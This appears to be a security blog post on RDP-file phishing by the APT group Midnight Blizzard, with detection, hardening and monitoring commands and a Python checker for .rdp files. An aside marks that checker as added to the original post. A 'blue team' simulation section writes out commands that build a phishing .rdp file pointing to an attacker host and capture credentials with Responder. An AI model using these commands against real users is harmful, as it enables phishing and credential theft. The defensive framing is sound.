
Remote Desktop Protocol (RDP) is a powerful tool for legitimate remote access, but it can also be weaponized by Advanced Persistent Threat (APT) groups like ‘Midnight Blizzard’. This article explores how attackers leverage malicious `.rdp` files in phishing campaigns to gain initial access and establish command and control (C2).
How the Attack Works
1. Spear Phishing with Malicious RDP Files
- Attackers send emails with `.rdp` attachments disguised as legitimate requests.
- The file contains pre-configured credentials or connects to a malicious RDP server.
2. Initial Access & Execution
- Once opened, the RDP file connects to an attacker-controlled server.
- Attackers harvest credentials or deploy additional payloads.
3. Lateral Movement & Persistence
- Attackers move laterally using tools like `Mimikatz` or Cobalt Strike.
- They establish persistence via scheduled tasks or registry modifications.
You Should Know:
1. Detecting Malicious RDP Files
- Check for suspicious RDP file parameters (the target host and any pre-filled username):
grep -i "full address:s" suspicious.rdp
grep -i "username:s" suspicious.rdp
- Use `rdp-tools` to inspect RDP files:
python3 rdp-checker.py malicious.rdp
2. Preventing RDP-Based Attacks
- Disable RDP if not needed:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- Enable Network Level Authentication (NLA):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
3. Monitoring RDP Connections
- Check active RDP sessions (Windows):
qwinsta /server:localhost
- Log RDP connections (Linux):
journalctl -u xrdp -f
4. Simulating an RDP Attack (For Blue Teams)
- Generate a malicious RDP file:
echo "full address:s:attacker-ip" > phishing.rdp
echo "username:s:victim" >> phishing.rdp
- Capture credentials with Responder:
sudo responder -I eth0 -wrf
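The detection step above greps an `.rdp` file for `full address:s` and `username:s`. The following is an added example (not code from the original post or from any `rdp-tools` project) that parses the `name:type:value` lines of an `.rdp` file and flags the settings that make such a file dangerous: a target host outside an assumed allowlist (`TRUSTED_HOSTS` is a constructed placeholder), pre-filled credentials, and local resource redirection, which hands drives, clipboard or smart cards to the remote server once the connection is made.

```python
import sys
from typing import Dict, List

# Assumption (constructed for this example): the organisation's legitimate RDP hosts.
TRUSTED_HOSTS = {"rdp.corp.example", "gateway.corp.example"}

# Real .rdp settings that hand local resources to the remote host once connected.
REDIRECTION_KEYS = {
    "drivestoredirect:s": "local drives shared with the remote host",
    "redirectclipboard:i": "clipboard shared with the remote host",
    "redirectsmartcards:i": "smart cards exposed to the remote host",
}

def parse_rdp(text: str) -> Dict[str, str]:
    """Parse 'name:type:value' lines into {'name:type': value}, ignoring malformed lines."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) != 3:
            continue
        name, typ, value = parts
        settings[f"{name.strip().lower()}:{typ.strip().lower()}"] = value.strip()
    return settings

def check_rdp(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious was found."""
    s = parse_rdp(text)
    findings: List[str] = []
    addr = s.get("full address:s", "")
    host = addr.split(":")[0].lower()          # strip an optional :port suffix
    if addr and host not in TRUSTED_HOSTS:
        findings.append(f"full address points at untrusted host {addr}")
    if s.get("username:s"):
        findings.append(f"pre-filled username {s['username:s']!r}")
    if s.get("password 51:b"):
        findings.append("embedded password blob (password 51:b)")
    for key, why in REDIRECTION_KEYS.items():
        value = s.get(key, "")
        if value not in ("", "0"):             # '*' or '1' enables the redirection
            findings.append(f"{key}:{value} -> {why}")
    return findings

# Constructed sample resembling a phishing .rdp file (203.0.113.10 is a documentation address).
SAMPLE_PHISH = """\
full address:s:203.0.113.10:3389
username:s:victim
drivestoredirect:s:*
redirectclipboard:i:1
"""
```

Run `check_rdp(open(path).read())` on a quarantined attachment; a non-empty result is a reason to block the mail and hunt for the `full address` host in proxy and firewall logs.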
What Undercode Say
RDP remains a prime target for APTs due to its widespread use and weak default configurations. Organizations must enforce strong authentication (MFA), monitor RDP logs, and train users to recognize phishing attempts.
Expected Output:
- Detected RDP brute-force attempts in logs.
- Identified unusual RDP session times.
- Blocked malicious `.rdp` files via email filtering.
Prediction
As cloud-based RDP solutions grow, attackers will shift to exploiting misconfigured cloud RDP instances. Zero-trust policies and strict access controls will become critical defenses.
Reference: A Midnight Blizzard Special: Simulating an RDP Phishing Campaign — PT 1
Reported By: Nathaniel Bair – Hackers Feeds


